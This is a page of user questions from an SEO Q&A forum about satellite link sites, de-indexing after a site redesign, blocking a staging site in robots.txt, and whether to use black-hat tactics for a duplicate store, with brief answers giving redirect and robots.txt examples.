  • This relates to a previous question I had about satellite sites, where I questioned the white-hattiness of the strategy. Basically, to increase the number of linking C-blocks, they created 100+ websites on different C-blocks that link back to our main domain. The issues I see are that the sites are 98% identical in appearance and content (only a small paragraph differs on each homepage), and that the sites have no inbound links, only outbound links to our main domain. Is this legit? I am not an SEO expert, but I have received awesome advice here. So thank you in advance!

    | Buddys
    0

  • We launched a redesign at the end of May and soon after, our website was de-indexed from Google. Here are the changes I have implemented so far to try to fix this: 1) 301 redirect chains - we changed all our URLs and implemented 301 redirects. However, these were multiple redirects, meaning one URL redirected to a second and then a third, and I was told this could confuse Google. For example: http://cncahealth.com 301s to http://www.cncahealth.com, which 301s to https://www.cncahealth.com. We wrote a rule for each variation of the URL, so now there is only a one-to-one 301 redirect, validated with urivalet.com (see the sketch below this question). 2) Canonical tags did not match URLs - we built the new website in a CMS that generated non-SEO-friendly URLs. We applied 301 redirects to those CMS URLs, but when we enable canonical tags within the CMS, it uses the original CMS URL rather than the URL of the page, so the canonical URL doesn't match the page. For now, I have disabled canonical tags until I can figure out a way to insert the canonical tag code manually without using the CMS's canonical feature. After these two fixes, our website still doesn't seem to be getting re-indexed by Google, even when I submit the sitemap in Google Webmaster Tools - the sitemap doesn't get indexed. Two more concerns I am hoping this community can address: 3) Cache-Control: private - I saw from urivalet.com that our Cache-Control is set to private. Is this affecting our being indexed, and should it be set to public? 4) Load balancer - our old website was not on a load balancer, but our new website is. When I look at servers in our analytics, I notice the site is served by one server and then another at different times. Is Google seeing the same thing, and is the load balancer confusing Google? I'm not sure what else could be keeping us from being indexed. Maybe it's just a waiting game after fixes 1 and 2, or do 3 and 4 (or other issues) also need to be addressed in order to get re-indexed? I hope someone can help me. Thanks!

    | rexjoec
    0
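
    On the redirect-chain point above: if the site runs on Apache, the usual fix is to fold protocol and host canonicalization into one rule, so any variant reaches the https://www. URL in a single 301. A minimal sketch (assuming mod_rewrite in .htaccess; the hostname comes from the question):

        RewriteEngine On
        # anything not already on https + www gets a single 301, not a chain
        RewriteCond %{HTTPS} off [OR]
        RewriteCond %{HTTP_HOST} !^www\. [NC]
        RewriteRule ^(.*)$ https://www.cncahealth.com/$1 [R=301,L]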

  • Our SEO provider created a bunch of "unique URL" websites on exact-match domain names. The content is pretty much the same across over 130 websites (only the city name differs), and they all link directly to our main site. For me this was a huge red flag, but when I questioned the provider, they said it was fine. We haven't seen a drop in traffic, but I'm concerned that Google just hasn't gotten to us yet. The DA of each of these sites is 1 after several months. Should we be worried? I think yes, but I am an SEO newbie.

    | Buddys
    0

  • Hello, We are soon going to upgrade the CMS to the latest version, along with new functionality; the process may take anywhere from 4 to 6 weeks, and we need to work on the live server. What we have planned: take an exact replica of the site and move it to a test domain (but on the live server), and block Google, Bing and Yahoo in robots.txt (User-agent: Google Disallow: /, User-agent: Bing Disallow: /, User-agent: Yahoo Disallow: /). We will upgrade the CMS and add functionality, test the entire structure, check URLs using Screaming Frog or Xenu, and then move everything onto the original domain. The concern is this: despite blocking Google, Bing and Yahoo through a user-agent disallow, can the URLs still be crawled by the search engines? If yes, it may hurt the original site, as the test domain will read as an entire duplicate. Or is there an alternate way around this (see the sketch below this question)? Many thanks

    | Modi
    1
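
    Two notes on the staging question above. First, the user-agent tokens crawlers actually match are Googlebot, Bingbot and Slurp, not "Google", "Bing" and "Yahoo", so the simplest safe robots.txt for the test domain blocks everyone:

        # robots.txt on the test domain only - never copy this to the live site
        User-agent: *
        Disallow: /

    Second, robots.txt only stops crawling; a blocked URL can still end up indexed from external links, so HTTP authentication on the test domain is the more airtight option.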

  • I have one online store where all the SEO rules are followed to increase rankings and sales. Buying a new URL and launching a new store (to sell exactly the same products) is fast, easy, and cheap. How about using black hat for this new store? I think I have nothing to lose. Is there something I should know before moving ahead? Launching a new store is very cheap, and black hat can be done by one of those overseas companies at low prices. First thing: this new store should not link to my actual store, I guess. Any advice? Thank you, BigBlaze

    | BigBlaze205
    0

Got a burning SEO question?

Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.



